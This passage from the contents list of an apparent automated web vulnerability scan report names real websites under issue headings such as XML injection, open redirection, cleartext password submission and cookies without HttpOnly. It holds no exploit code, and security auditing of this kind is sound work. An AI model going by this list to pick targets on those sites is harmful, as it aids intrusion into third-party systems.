7.392. http://www.playsushi.com/crossdomain.xml

7.393. http://www.plentyoffish.com/crossdomain.xml

7.394. http://www.pogo.com/crossdomain.xml

7.395. http://www.politico.com/crossdomain.xml

7.396. http://www.politicsdaily.com/crossdomain.xml

7.397. http://www.poptropica.com/crossdomain.xml

7.398. http://www.potterybarn.com/crossdomain.xml

7.399. http://www.progressive.com/crossdomain.xml

7.400. http://www.psu.edu/crossdomain.xml

7.401. http://www.realage.com/crossdomain.xml

7.402. http://www.rei.com/crossdomain.xml

7.403. http://www.reuters.com/crossdomain.xml

7.404. http://www.reverbnation.com/crossdomain.xml

7.405. http://www.rightathome.com/crossdomain.xml

7.406. http://www.rivals.com/crossdomain.xml

7.407. http://www.rockyou.com/crossdomain.xml

7.408. http://www.rotoworld.com/crossdomain.xml

7.409. http://www.rottentomatoes.com/crossdomain.xml

7.410. http://www.roxwel.com/crossdomain.xml

7.411. http://www.salesforce.com/crossdomain.xml

7.412. http://www.salon.com/crossdomain.xml

7.413. http://www.scholastic.com/crossdomain.xml

7.414. http://www.sears.com/crossdomain.xml

7.415. http://www.seattlepi.com/crossdomain.xml

7.416. http://www.shangri-la.com/crossdomain.xml

7.417. http://www.shopathome.com/crossdomain.xml

7.418. http://www.shopstyle.com/crossdomain.xml

7.419. http://www.shutterfly.com/crossdomain.xml

7.420. http://www.simon.com/crossdomain.xml

7.421. http://www.simplyhired.com/crossdomain.xml

7.422. http://www.sixflags.com/crossdomain.xml

7.423. http://www.sky.com/crossdomain.xml

7.424. http://www.skype.com/crossdomain.xml

7.425. http://www.slate.com/crossdomain.xml

7.426. http://www.slide.com/crossdomain.xml

7.427. http://www.smarter.com/crossdomain.xml

7.428. http://www.smilebox.com/crossdomain.xml

7.429. http://www.smileycentral.com/crossdomain.xml

7.430. http://www.snapfish.com/crossdomain.xml

7.431. http://www.softonic.com/crossdomain.xml

7.432. http://www.spanishdict.com/crossdomain.xml

7.433. http://www.spellingcity.com/crossdomain.xml

7.434. http://www.sportsauthority.com/crossdomain.xml

7.435. http://www.star-telegram.com/crossdomain.xml

7.436. http://www.startribune.com/crossdomain.xml

7.437. http://www.stumbleupon.com/crossdomain.xml

7.438. http://www.stylelist.com/crossdomain.xml

7.439. http://www.superpages.com/crossdomain.xml

7.440. http://www.symantec.com/crossdomain.xml

7.441. http://www.t-mobile.com/crossdomain.xml

7.442. http://www.tagged.com/crossdomain.xml

7.443. http://www.target.com/crossdomain.xml

7.444. http://www.tarot.com/crossdomain.xml

7.445. http://www.tasteofhome.com/crossdomain.xml

7.446. http://www.telegraph.co.uk/crossdomain.xml

7.447. http://www.thefrisky.com/crossdomain.xml

7.448. http://www.thirdage.com/crossdomain.xml

7.449. http://www.ticketmaster.com/crossdomain.xml

7.450. http://www.tigerdirect.com/crossdomain.xml

7.451. http://www.tinypic.com/crossdomain.xml

7.452. http://www.tmz.com/crossdomain.xml

7.453. http://www.toptenreviews.com/crossdomain.xml

7.454. http://www.toyota.com/crossdomain.xml

7.455. http://www.toysrus.com/crossdomain.xml

7.456. http://www.tracfone.com/crossdomain.xml

7.457. http://www.travelocity.com/crossdomain.xml

7.458. http://www.tripadvisor.com/crossdomain.xml

7.459. http://www.true.com/crossdomain.xml

7.460. http://www.trulia.com/crossdomain.xml

7.461. http://www.tv.com/crossdomain.xml

7.462. http://www.tvguide.com/crossdomain.xml

7.463. http://www.univision.com/crossdomain.xml

7.464. http://www.ups.com/crossdomain.xml

7.465. http://www.usatoday.com/crossdomain.xml

7.466. http://www.use.com/crossdomain.xml

7.467. http://www.usgs.gov/crossdomain.xml

7.468. http://www.usmagazine.com/crossdomain.xml

7.469. http://www.vast.com/crossdomain.xml

7.470. http://www.verizon.net/crossdomain.xml

7.471. http://www.victoriassecret.com/crossdomain.xml

7.472. http://www.videobash.com/crossdomain.xml

7.473. http://www.walletpop.com/crossdomain.xml

7.474. http://www.walmart.com/crossdomain.xml

7.475. http://www.warnerbros.com/crossdomain.xml

7.476. http://www.washingtonpost.com/crossdomain.xml

7.477. http://www.weather.com/crossdomain.xml

7.478. http://www.webshots.com/crossdomain.xml

7.479. http://www.weightwatchers.com/crossdomain.xml

7.480. http://www.wetpaint.com/crossdomain.xml

7.481. http://www.whitehouse.gov/crossdomain.xml

7.482. http://www.wimp.com/crossdomain.xml

7.483. http://www.wn.com/crossdomain.xml

7.484. http://www.womansday.com/crossdomain.xml

7.485. http://www.worldwinner.com/crossdomain.xml

7.486. http://www.wsbtv.com/crossdomain.xml

7.487. http://www.wwe.com/crossdomain.xml

7.488. http://www.yallwire.com/crossdomain.xml

7.489. http://www.yellowpages.com/crossdomain.xml

7.490. http://www.yontoo.com/crossdomain.xml

7.491. http://www.zap2it.com/crossdomain.xml

7.492. http://www.zappos.com/crossdomain.xml

7.493. http://www.zazzle.com/crossdomain.xml

7.494. http://www.zmags.com/crossdomain.xml

7.495. http://www.zshare.net/crossdomain.xml

7.496. http://www.zwinky.com/crossdomain.xml

7.497. http://www.zynga.com/crossdomain.xml

7.498. http://www.active.com/crossdomain.xml

7.499. http://www.allmenus.com/crossdomain.xml

7.500. http://www.autotrader.com/crossdomain.xml

7.501. http://www.autotraderstatic.com/crossdomain.xml

7.502. http://www.blackplanet.com/crossdomain.xml

7.503. http://www.boston.com/crossdomain.xml

7.504. http://www.christianbook.com/crossdomain.xml

7.505. http://www.chuckecheese.com/crossdomain.xml

7.506. http://www.cincinnati.com/crossdomain.xml

7.507. http://www.continental.com/crossdomain.xml

7.508. http://www.deadline.com/crossdomain.xml

7.509. http://www.deviantart.com/crossdomain.xml

7.510. http://www.dreamstime.com/crossdomain.xml

7.511. http://www.elyrics.net/crossdomain.xml

7.512. http://www.elyricsworld.com/crossdomain.xml

7.513. http://www.epicurious.com/crossdomain.xml

7.514. http://www.greatschools.org/crossdomain.xml

7.515. http://www.icontact.com/crossdomain.xml

7.516. http://www.inbox.com/crossdomain.xml

7.517. http://www.iwon.com/crossdomain.xml

7.518. http://www.justluxe.com/crossdomain.xml

7.519. http://www.kazaa.com/crossdomain.xml

7.520. http://www.kodak.com/crossdomain.xml

7.521. http://www.livejournal.com/crossdomain.xml

7.522. http://www.loc.gov/crossdomain.xml

7.523. http://www.lowfares.com/crossdomain.xml

7.524. http://www.lyricsmode.com/crossdomain.xml

7.525. http://www.marriott.com/crossdomain.xml

7.526. http://www.michaels.com/crossdomain.xml

7.527. http://www.mlive.com/crossdomain.xml

7.528. http://www.motime.com/crossdomain.xml

7.529. http://www.movietickets.com/crossdomain.xml

7.530. http://www.orbitz.com/crossdomain.xml

7.531. http://www.panoramio.com/crossdomain.xml

7.532. http://www.phoenix.edu/crossdomain.xml

7.533. http://www.playdom.com/crossdomain.xml

7.534. http://www.regions.com/crossdomain.xml

7.535. http://www.rr.com/crossdomain.xml

7.536. http://www.sacbee.com/crossdomain.xml

7.537. http://www.sharebuilder.com/crossdomain.xml

7.538. http://www.stltoday.com/crossdomain.xml

7.539. http://www.stlyrics.com/crossdomain.xml

7.540. http://www.talkingpointsmemo.com/crossdomain.xml

7.541. http://www.tamu.edu/crossdomain.xml

7.542. http://www.thisis50.com/crossdomain.xml

7.543. http://www.thomasnet.com/crossdomain.xml

7.544. http://www.tradekey.com/crossdomain.xml

7.545. http://www.umich.edu/crossdomain.xml

7.546. http://www.verisign.com/crossdomain.xml

7.547. http://www.vimeo.com/crossdomain.xml

7.548. http://www.vistaprint.com/crossdomain.xml

7.549. http://www.walgreens.com/crossdomain.xml

7.550. http://www.xe.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://s0.2mdn.net/clientaccesspolicy.xml

8.3. http://www.cbssports.com/clientaccesspolicy.xml

8.4. http://www.coveritlive.com/clientaccesspolicy.xml

8.5. http://www.intellicast.com/clientaccesspolicy.xml

8.6. http://www.nadaguides.com/clientaccesspolicy.xml

8.7. http://www.ncm.com/clientaccesspolicy.xml

8.8. http://www.opinionshere.com/clientaccesspolicy.xml

8.9. http://www.safelinkwireless.com/clientaccesspolicy.xml

8.10. http://www.usatoday.com/clientaccesspolicy.xml

8.11. http://www.winbuyer.com/clientaccesspolicy.xml

8.12. http://www.cbs.com/clientaccesspolicy.xml

8.13. http://www.cnbc.com/clientaccesspolicy.xml

8.14. http://www.fidelity.com/clientaccesspolicy.xml

8.15. http://www.indiatimes.com/clientaccesspolicy.xml

8.16. http://www.msnbc.com/clientaccesspolicy.xml

8.17. http://www.nationalgeographic.com/clientaccesspolicy.xml

8.18. http://www.sky.com/clientaccesspolicy.xml

8.19. http://www.xbox.com/clientaccesspolicy.xml

8.20. http://www.kmart.com/clientaccesspolicy.xml

8.21. http://www.sears.com/clientaccesspolicy.xml

8.22. http://www.usa.gov/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://www.collegehumor.com/favicon.ico

9.2. http://www.popularscreensavers.com/favicon.ico

9.3. http://www.popularscreensavers.com/favicon.ico

9.4. http://www.popularscreensavers.com/favicon.ico

10. XML injection

10.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]

10.2. http://www.altervista.org/favicon.ico [REST URL parameter 1]

10.3. http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]

10.4. http://www.bizrate.com/favicon.ico [REST URL parameter 1]

10.5. http://www.bravotv.com/favicon.ico [REST URL parameter 1]

10.6. http://www.columbia.edu/favicon.ico [REST URL parameter 1]

10.7. http://www.consumersearch.com/favicon.ico [REST URL parameter 1]

10.8. http://www.dickssportinggoods.com/favicon.ico [REST URL parameter 1]

10.9. http://www.diynetwork.com/favicon.ico [REST URL parameter 1]

10.10. http://www.ehow.co.uk/favicon.ico [REST URL parameter 1]

10.11. http://www.examiner.com/favicon.ico [REST URL parameter 1]

10.12. http://www.foodnetwork.com/favicon.ico [REST URL parameter 1]

10.13. http://www.hollywoodlife.com/favicon.ico [REST URL parameter 1]

10.14. http://www.house.gov/favicon.ico [REST URL parameter 1]

10.15. http://www.k12.com/favicon.ico [REST URL parameter 1]

10.16. http://www.kazaa.com/favicon.ico [REST URL parameter 1]

10.17. http://www.macrumors.com/favicon.ico [REST URL parameter 1]

10.18. http://www.orbitz.com/favicon.ico [REST URL parameter 1]

10.19. http://www.psu.edu/favicon.ico [REST URL parameter 1]

10.20. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

10.21. http://www.southwest.com/favicon.ico [REST URL parameter 1]

10.22. http://www.ufl.edu/favicon.ico [REST URL parameter 1]

10.23. http://www.ultimate-guitar.com/favicon.ico [REST URL parameter 1]

10.24. http://www.usgs.gov/favicon.ico [REST URL parameter 1]

10.25. http://www.where2getit.com/favicon.ico [REST URL parameter 1]

10.26. http://www.wimp.com/favicon.ico [REST URL parameter 1]

10.27. http://www.wunderground.com/favicon.ico [REST URL parameter 1]

11. ASP.NET ViewState without MAC enabled

12. Open redirection

12.1. http://www.lalate.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.2. http://www.outsidehub.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.3. http://www.paypal-shopping.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.4. http://www.swipebids.com/favicon.ico [REST URL parameter 1]

12.5. http://www.swipebids.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.6. http://www.virtuagirlhd.com/favicon.ico [name of an arbitrarily supplied request parameter]

13. Cookie scoped to parent domain

13.1. http://www.androidcentral.com/favicon.ico

13.2. http://www.easybib.com/favicon.ico

13.3. http://www.evite.com/favicon.ico

13.4. http://www.genealogy.com/favicon.ico

13.5. http://www.mapquest.com/favicon.ico

13.6. http://www.mayoclinic.com/favicon.ico

13.7. http://www.musiciansfriend.com/favicon.ico

13.8. http://www.ning.com/favicon.ico

13.9. http://www.pronto.com/favicon.ico

13.10. http://www.softonic.com/favicon.ico

13.11. http://www.thisis50.com/favicon.ico

13.12. http://www.worthpoint.com/favicon.ico

13.13. http://maps.google.com/maps

13.14. http://maps.google.com/maps/gen_204

13.15. http://maps.google.com/maps/vp

13.16. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.17. http://translate.google.com/translate_a/element.js

13.18. http://www.411.com/favicon.ico

13.19. http://www.addresses.com/favicon.ico

13.20. http://www.advanceautoparts.com/favicon.ico

13.21. http://www.alibaba.com/favicon.ico

13.22. http://www.americanexpress.com/favicon.ico

13.23. http://www.apartments.com/favicon.ico

13.24. http://www.automotive.com/favicon.ico

13.25. http://www.autotrader.com/favicon.ico

13.26. http://www.baidu.com/favicon.ico

13.27. http://www.bidcactus.com/favicon.ico

13.28. http://www.bizjournals.com/favicon.ico

13.29. http://www.buzznet.com/favicon.ico

13.30. http://www.cisco.com/favicon.ico

13.31. http://www.collegehumor.com/favicon.ico

13.32. http://www.cornell.edu/favicon.ico

13.33. http://www.directv.com/favicon.ico

13.34. http://www.discovercard.com/favicon.ico

13.35. http://www.eharmony.com/favicon.ico

13.36. http://www.emedtv.com/favicon.ico

13.37. http://www.epinions.com/favicon.ico

13.38. http://www.fedex.com/favicon.ico

13.39. http://www.fool.com/favicon.ico

13.40. http://www.funbrain.com/favicon.ico

13.41. http://www.gamehouse.com/favicon.ico

13.42. http://www.guardian.co.uk/favicon.ico

13.43. http://www.hayneedle.com/favicon.ico

13.44. http://www.hiexpress.com/favicon.ico

13.45. http://www.holidayinn.com/favicon.ico

13.46. http://www.hsn.com/favicon.ico

13.47. http://www.ichotelsgroup.com/favicon.ico

13.48. http://www.imageshack.us/favicon.ico

13.49. http://www.know-where.com/favicon.ico

13.50. http://www.life123.com/favicon.ico

13.51. http://www.lingospot.com/favicon.ico

13.52. http://www.marykay.com/favicon.ico

13.53. http://www.mbnanetaccess.com/favicon.ico

13.54. http://www.metropcs.com/favicon.ico

13.55. http://www.motortrend.com/favicon.ico

13.56. http://www.netflix.com/favicon.ico

13.57. http://www.nintendo.com/favicon.ico

13.58. http://www.nytimes.com/favicon.ico

13.59. http://www.officedepot.com/favicon.ico

13.60. http://www.okcupid.com/favicon.ico

13.61. http://www.pbs.org/favicon.ico

13.62. http://www.pizzahut.com/favicon.ico

13.63. http://www.playlist.com/favicon.ico

13.64. http://www.potterybarn.com/favicon.ico

13.65. http://www.progressive.com/favicon.ico

13.66. http://www.qvc.com/favicon.ico

13.67. http://www.qwest.com/favicon.ico

13.68. http://www.seniorpeoplemeet.com/favicon.ico

13.69. http://www.sfgate.com/favicon.ico

13.70. http://www.sharebuilder.com/favicon.ico

13.71. http://www.terra.com/favicon.ico

13.72. http://www.thefind.com/favicon.ico

13.73. http://www.thehollywoodgossip.com/favicon.ico

13.74. http://www.ticketmaster.com/favicon.ico

13.75. http://www.travelocity.com/favicon.ico

13.76. http://www.true.com/favicon.ico

13.77. http://www.uhaul.com/favicon.ico

13.78. http://www.united.com/favicon.ico

13.79. http://www.veoh.com/favicon.ico

13.80. http://www.verisign.com/favicon.ico

13.81. http://www.virtualtourist.com/favicon.ico

13.82. http://www.vistaprint.com/favicon.ico

13.83. http://www.wachovia.com/favicon.ico

13.84. http://www.warnerbros.com/favicon.ico

13.85. http://www.wellsfargo.com/favicon.ico

13.86. http://www.whitepages.com/favicon.ico

13.87. http://www.wsbtv.com/favicon.ico

13.88. http://www.yellowpages.com/favicon.ico

14. Cookie without HttpOnly flag set

14.1. http://www.androidcentral.com/favicon.ico

14.2. http://www.aon.com/favicon.ico

14.3. http://www.biglots.com/favicon.ico

14.4. http://www.bullishbankers.com/favicon.ico

14.5. http://www.centurylink.com/favicon.ico

14.6. http://www.chacha.com/favicon.ico

14.7. http://www.emedicinehealth.com/favicon.ico

14.8. http://www.evite.com/favicon.ico

14.9. http://www.freeridegames.com/favicon.ico

14.10. http://www.genealogy.com/favicon.ico

14.11. http://www.gofreecredit.com/favicon.ico

14.12. http://www.hayneedle.com/favicon.ico

14.13. http://www.kaboodle.com/favicon.ico

14.14. http://www.livevideo.com/favicon.ico

14.15. http://www.lowermybills.com/favicon.ico

14.16. http://www.lyrics.com/favicon.ico

14.17. http://www.mapquest.com/favicon.ico

14.18. http://www.mayoclinic.com/favicon.ico

14.19. http://www.medicinenet.com/favicon.ico

14.20. http://www.mrmovietimes.com/favicon.ico

14.21. http://www.musiciansfriend.com/favicon.ico

14.22. http://www.ncnetwork.net/favicon.ico

14.23. http://www.ning.com/favicon.ico

14.24. http://www.popularscreensavers.com/favicon.ico

14.25. http://www.prioritymail.com/favicon.ico

14.26. http://www.pronto.com/favicon.ico

14.27. http://www.questia.com/favicon.ico

14.28. http://www.rxlist.com/favicon.ico

14.29. http://www.softonic.com/favicon.ico

14.30. http://www.suntimes.com/favicon.ico

14.31. http://www.thegrids.info/favicon.ico

14.32. http://www.thisis50.com/favicon.ico

14.33. http://www.travel-ticker.com/favicon.ico

14.34. http://www.usajobs.gov/favicon.ico

14.35. http://www.verizon.net/favicon.ico

14.36. http://www.websitealive.com/favicon.ico

14.37. http://www.wellness.com/favicon.ico

14.38. http://www.wendys.com/favicon.ico

14.39. http://www.windows.com/favicon.ico

14.40. http://www.worthpoint.com/favicon.ico

14.41. http://maps.google.com/maps

14.42. http://maps.google.com/maps/gen_204

14.43. http://maps.google.com/maps/vp

14.44. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.45. http://smp.adviva.net/track/v=4

14.46. http://translate.google.com/translate_a/element.js

14.47. http://www.2wire.net/favicon.ico

14.48. http://www.411.com/favicon.ico

14.49. http://www.4shared.com/favicon.ico

14.50. http://www.aarp.org/favicon.ico

14.51. http://www.aboutus.org/favicon.ico

14.52. http://www.addresses.com/favicon.ico

14.53. http://www.adp.com/favicon.ico

14.54. http://www.advanceautoparts.com/favicon.ico

14.55. http://www.alibaba.com/favicon.ico

14.56. http://www.americanexpress.com/favicon.ico

14.57. http://www.americantowns.com/favicon.ico

14.58. http://www.apartmentratings.com/favicon.ico

14.59. http://www.apartments.com/favicon.ico

14.60. http://www.automotive.com/favicon.ico

14.61. http://www.autotrader.com/favicon.ico

14.62. http://www.autozone.com/favicon.ico

14.63. http://www.away.com/favicon.ico

14.64. http://www.baidu.com/favicon.ico

14.65. http://www.bankofamerica.com/favicon.ico

14.66. http://www.bbt.com/favicon.ico

14.67. http://www.bidcactus.com/favicon.ico

14.68. http://www.bizjournals.com/favicon.ico

14.69. http://www.blogrolling.com/favicon.ico

14.70. http://www.business.com/favicon.ico

14.71. http://www.buzznet.com/favicon.ico

14.72. http://www.carmax.com/favicon.ico

14.73. http://www.cars.com/favicon.ico

14.74. http://www.cheapoair.com/favicon.ico

14.75. http://www.cheaptickets.com/favicon.ico

14.76. http://www.cisco.com/favicon.ico

14.77. http://www.classesusa.com/favicon.ico

14.78. http://www.cnn.com/favicon.ico

14.79. http://www.collegeconfidential.com/favicon.ico

14.80. http://www.collegehumor.com/favicon.ico

14.81. http://www.collegesurfing.com/favicon.ico

14.82. http://www.comcast.com/favicon.ico

14.83. http://www.contacthr.com/favicon.ico

14.84. http://www.cornell.edu/favicon.ico

14.85. http://www.coupons.com/favicon.ico

14.86. http://www.cracked.com/favicon.ico

14.87. http://www.curse.com/favicon.ico

14.88. http://www.cyberdefender.com/favicon.ico

14.89. http://www.dallasnews.com/favicon.ico

14.90. http://www.dealer.com/favicon.ico

14.91. http://www.deere.com/favicon.ico

14.92. http://www.directv.com/favicon.ico

14.93. http://www.discovercard.com/favicon.ico

14.94. http://www.doityourself.com/favicon.ico

14.95. http://www.drugstore.com/favicon.ico

14.96. http://www.eharmony.com/favicon.ico

14.97. http://www.ehealthforum.com/favicon.ico

14.98. http://www.emedtv.com/favicon.ico

14.99. http://www.epinions.com/favicon.ico

14.100. http://www.factmonster.com/favicon.ico

14.101. http://www.familydoctor.org/favicon.ico

14.102. http://www.fedex.com/favicon.ico

14.103. http://www.fool.com/favicon.ico

14.104. http://www.frontier.com/favicon.ico

14.105. http://www.funbrain.com/favicon.ico

14.106. http://www.gamehouse.com/favicon.ico

14.107. http://www.gifts.com/favicon.ico

14.108. http://www.guardian.co.uk/favicon.ico

14.109. http://www.guitarcenter.com/favicon.ico

14.110. http://www.gunbroker.com/favicon.ico

14.111. http://www.healthgrades.com/favicon.ico

14.112. http://www.hi5.com/favicon.ico

14.113. http://www.hiexpress.com/favicon.ico

14.114. http://www.holidayinn.com/favicon.ico

14.115. http://www.hotpads.com/favicon.ico

14.116. http://www.hsbccreditcard.com/favicon.ico

14.117. http://www.hsn.com/favicon.ico

14.118. http://www.hubspot.com/favicon.ico

14.119. http://www.ichotelsgroup.com/favicon.ico

14.120. http://www.imageshack.us/favicon.ico

14.121. http://www.in.gov/favicon.ico

14.122. http://www.info.com/favicon.ico

14.123. http://www.infoplease.com/favicon.ico

14.124. http://www.informationgetter.com/favicon.ico

14.125. http://www.intelius.com/favicon.ico

14.126. http://www.investopedia.com/favicon.ico

14.127. http://www.iwon.com/favicon.ico

14.128. http://www.joann.com/favicon.ico

14.129. http://www.jstor.org/favicon.ico

14.130. http://www.kaspersky.com/favicon.ico

14.131. http://www.kbb.com/favicon.ico

14.132. http://www.kcom.com/

14.133. http://www.kcom.com/contact-us/

14.134. http://www.kcom.com/contact-us/brighton

14.135. http://www.kcom.com/large-enterprise/

14.136. http://www.know-where.com/favicon.ico

14.137. http://www.kosmix.com/favicon.ico

14.138. http://www.life123.com/favicon.ico

14.139. http://www.lingospot.com/favicon.ico

14.140. http://www.livenation.com/favicon.ico

14.141. http://www.livescience.com/favicon.ico

14.142. http://www.marykay.com/favicon.ico

14.143. http://www.mbnanetaccess.com/favicon.ico

14.144. http://www.medscape.com/favicon.ico

14.145. http://www.merck.com/favicon.ico

14.146. http://www.modelmayhem.com/favicon.ico

14.147. http://www.motime.com/favicon.ico

14.148. http://www.motortrend.com/favicon.ico

14.149. http://www.mynewplace.com/favicon.ico

14.150. http://www.newegg.com/favicon.ico

14.151. http://www.nintendo.com/favicon.ico

14.152. http://www.nydailynews.com/favicon.ico

14.153. http://www.nymag.com/favicon.ico

14.154. http://www.nytimes.com/favicon.ico

14.155. http://www.officedepot.com/favicon.ico

14.156. http://www.okcupid.com/favicon.ico

14.157. http://www.olivegarden.com/favicon.ico

14.158. http://www.onemanga.com/favicon.ico

14.159. http://www.openforum.com/favicon.ico

14.160. http://www.opinionshere.com/favicon.ico

14.161. http://www.orbitz.com/favicon.ico

14.162. http://www.orchardbank.com/favicon.ico

14.163. http://www.outdoorchannel.com/favicon.ico

14.164. http://www.pbs.org/favicon.ico

14.165. http://www.peekyou.com/favicon.ico

14.166. http://www.peoplelookup.com/favicon.ico

14.167. http://www.pizzahut.com/favicon.ico

14.168. http://www.playlist.com/favicon.ico

14.169. http://www.pnc.com/favicon.ico

14.170. http://www.potterybarn.com/favicon.ico

14.171. http://www.pricegrabber.com/favicon.ico

14.172. http://www.progressive.com/favicon.ico

14.173. http://www.purdue.edu/favicon.ico

14.174. http://www.qualityhealth.com/favicon.ico

14.175. http://www.qvc.com/favicon.ico

14.176. http://www.qwest.com/favicon.ico

14.177. http://www.regions.com/favicon.ico

14.178. http://www.reverbnation.com/favicon.ico

14.179. http://www.righthealth.com/favicon.ico

14.180. http://www.searchassist.com/favicon.ico

14.181. http://www.sfgate.com/favicon.ico

14.182. http://www.sharebuilder.com/favicon.ico

14.183. http://www.shoebuy.com/favicon.ico

14.184. http://www.shutterfly.com/favicon.ico

14.185. http://www.snapfish.com/favicon.ico

14.186. http://www.space.com/favicon.ico

14.187. http://www.staples.com/favicon.ico

14.188. http://www.straighttalk.com/favicon.ico

14.189. http://www.suite101.com/favicon.ico

14.190. http://www.terra.com/favicon.ico

14.191. http://www.thefind.com/favicon.ico

14.192. http://www.theglobeandmail.com/favicon.ico

14.193. http://www.thehollywoodgossip.com/favicon.ico

14.194. http://www.thinkquest.org/favicon.ico

14.195. http://www.ticketmaster.com/favicon.ico

14.196. http://www.totalbeauty.com/favicon.ico

14.197. http://www.tracfone.com/favicon.ico

14.198. http://www.travelocity.com/favicon.ico

14.199. http://www.true.com/favicon.ico

14.200. http://www.tvtxtr.com/favicon.ico

14.201. http://www.uhaul.com/favicon.ico

14.202. http://www.united.com/favicon.ico

14.203. http://www.usa-people-search.com/favicon.ico

14.204. http://www.veoh.com/favicon.ico

14.205. http://www.verisign.com/favicon.ico

14.206. http://www.videobash.com/favicon.ico

14.207. http://www.virtualtourist.com/favicon.ico

14.208. http://www.vistaprint.com/favicon.ico

14.209. http://www.wachovia.com/favicon.ico

14.210. http://www.warnerbros.com/favicon.ico

14.211. http://www.webs.com/favicon.ico

14.212. http://www.wellsfargo.com/favicon.ico

14.213. http://www.whitepages.com/favicon.ico

14.214. http://www.wildgames.com/favicon.ico

14.215. http://www.wirefly.com/favicon.ico

14.216. http://www.wsbtv.com/favicon.ico

14.217. http://www.xe.com/favicon.ico

14.218. http://www.yellowpages.com/favicon.ico

14.219. http://www.zillow.com/favicon.ico

15. Password field with autocomplete enabled

15.1. http://www.collegehumor.com/favicon.ico

15.2. http://www.popularscreensavers.com/favicon.ico

15.3. http://www.popularscreensavers.com/favicon.ico

15.4. http://www.popularscreensavers.com/favicon.ico

16. ASP.NET debugging enabled

16.1. http://www.blogtv.com/Default.aspx

16.2. http://www.clearchannel.com/Default.aspx

16.3. http://www.findlocation.com/Default.aspx

16.4. http://www.investopedia.com/Default.aspx

16.5. http://www.medicare.gov/Default.aspx

16.6. http://www.netquote.com/Default.aspx

16.7. http://www.newegg.com/Default.aspx

16.8. http://www.pch.com/Default.aspx

16.9. http://www.plentyoffish.com/Default.aspx

16.10. http://www.pricegong.com/Default.aspx

16.11. http://www.shopperreports.com/Default.aspx

16.12. http://www.tidaltv.com/Default.aspx

16.13. http://www.weatherbug.com/Default.aspx

16.14. http://www.wellness.com/Default.aspx

16.15. http://www.winbuyer.com/Default.aspx

17. Referer-dependent response

18. Cross-domain POST

18.1. http://www.kcom.com/contact-us/

18.2. http://www.realsimple.com/favicon.ico

19. Cross-domain Referer leakage

19.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

19.2. http://fls.doubleclick.net/activityi

19.3. http://fls.doubleclick.net/activityi

19.4. http://googleads.g.doubleclick.net/pagead/ads

19.5. http://googleads.g.doubleclick.net/pagead/ads

19.6. http://googleads.g.doubleclick.net/pagead/ads

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://googleads.g.doubleclick.net/pagead/ads

19.11. http://googleads.g.doubleclick.net/pagead/ads

19.12. http://googleads.g.doubleclick.net/pagead/ads

19.13. http://googleads.g.doubleclick.net/pagead/ads

19.14. http://googleads.g.doubleclick.net/pagead/ads

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://googleads.g.doubleclick.net/pagead/ads

19.18. http://googleads.g.doubleclick.net/pagead/ads

19.19. http://googleads.g.doubleclick.net/pagead/ads

19.20. http://googleads.g.doubleclick.net/pagead/ads

19.21. http://googleads.g.doubleclick.net/pagead/ads

19.22. http://googleads.g.doubleclick.net/pagead/ads

19.23. http://googleads.g.doubleclick.net/pagead/ads

19.24. http://googleads.g.doubleclick.net/pagead/ads

19.25. http://googleads.g.doubleclick.net/pagead/ads

19.26. http://googleads.g.doubleclick.net/pagead/ads

19.27. http://googleads.g.doubleclick.net/pagead/ads

19.28. http://googleads.g.doubleclick.net/pagead/ads

19.29. http://googleads.g.doubleclick.net/pagead/ads

19.30. http://googleads.g.doubleclick.net/pagead/ads

19.31. http://googleads.g.doubleclick.net/pagead/ads

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://googleads.g.doubleclick.net/pagead/ads

19.35. http://googleads.g.doubleclick.net/pagead/ads

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://googleads.g.doubleclick.net/pagead/ads

19.43. http://googleads.g.doubleclick.net/pagead/ads

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

20.2. http://fls.doubleclick.net/activityi

20.3. http://googleads.g.doubleclick.net/pagead/ads

20.4. http://googleads.g.doubleclick.net/pagead/ads

20.5. http://www.411.com/favicon.ico

20.6. http://www.800notes.com/favicon.ico

20.7. http://www.androidcentral.com/favicon.ico

20.8. http://www.biglots.com/favicon.ico

20.9. http://www.bizjournals.com/favicon.ico

20.10. http://www.blogs.com/favicon.ico

20.11. http://www.bullishbankers.com/favicon.ico

20.12. http://www.canon.com/favicon.ico

20.13. http://www.citibank.com/favicon.ico

20.14. http://www.collegehumor.com/favicon.ico

20.15. http://www.curse.com/favicon.ico

20.16. http://www.dealer.com/favicon.ico

20.17. http://www.dexknows.com/favicon.ico

20.18. http://www.ebayclassifieds.com/favicon.ico

20.19. http://www.elyricsworld.com/favicon.ico

20.20. http://www.freeridegames.com/favicon.ico

20.21. http://www.games.com/favicon.ico

20.22. http://www.guitarcenter.com/favicon.ico

20.23. http://www.hayneedle.com/favicon.ico

20.24. http://www.iloveindia.com/favicon.ico

20.25. http://www.kcom.com/contact-us/brighton

20.26. http://www.lanebryant.com/favicon.ico

20.27. http://www.life123.com/favicon.ico

20.28. http://www.menupages.com/favicon.ico

20.29. http://www.moshimonsters.com/favicon.ico

20.30. http://www.mrmovietimes.com/favicon.ico

20.31. http://www.myrecipes.com/favicon.ico

20.32. http://www.newport-news.com/favicon.ico

20.33. http://www.onemanga.com/favicon.ico

